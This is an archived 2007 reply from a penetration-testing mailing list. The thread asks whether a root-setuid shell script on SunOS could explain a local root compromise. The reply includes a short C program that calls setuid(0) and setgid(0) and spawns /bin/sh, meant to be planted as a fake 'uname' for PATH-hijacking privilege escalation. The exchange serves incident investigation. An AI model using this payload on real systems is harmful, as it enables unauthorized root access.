Penetration Testing mailing list archives
Re: solaris root-setuid script to gain root?
From: "Thomas Pollet" <thomas.pollet () gmail com>
Date: Sat, 30 Jun 2007 16:47:11 +0200
Hello, On 30/06/07, Vitalik N. <robert.morris.jr () gmail com> wrote:
Hi I was doing pen testing the other day and I found one root suid script left by some of the web developers: -rwsr-x--x 1 root users /home/web/c.cgi which is basically a bash script: ------ cut ------------ #!/bin/sh uname ------ cut ------------ And our system was recently compromised. Some local user was able to gain root access. Could this script be the way of gaining root access? According to http://www.unix.com/tips-and-tutorials/36711-the-whole-story-on-usr-bin-ksh.html "Because it was not possible to write a secure suid shell script, the concept of suid shell scripts was removed from Unix." But then it says "Solaris now supports suid shell" ! I tried modifying the PATH variable and creating my own "uname" program. But my uname program runs with local user privs instead of root. I also tried the
did you put a setuid(0) in your uname program? f.i.: cat >uname.c<<EOF #include <unistd.h> int main (int argc, char **argv, char **envp) { setuid(0); setgid(0); execve("/bin/sh",argv,envp); } EOF
other attack described in the link above: "link to -i" but this didn't work as well. So could this script be the problem? P.S: The machine runs SunOS 5.6 with all updates
Regards, Thomas Pollet ------------------------------------------------------------------------ This List Sponsored by: Cenzic Swap Out your SPI or Watchfire app sec solution for Cenzic's robust, accurate risk assessment and management solution FREE - limited Time Offer http://www.cenzic.com/wf-spi ------------------------------------------------------------------------
Current thread:
- solaris root-setuid script to gain root? Vitalik N. (Jun 30)
- Re: solaris root-setuid script to gain root? Thomas Pollet (Jun 30)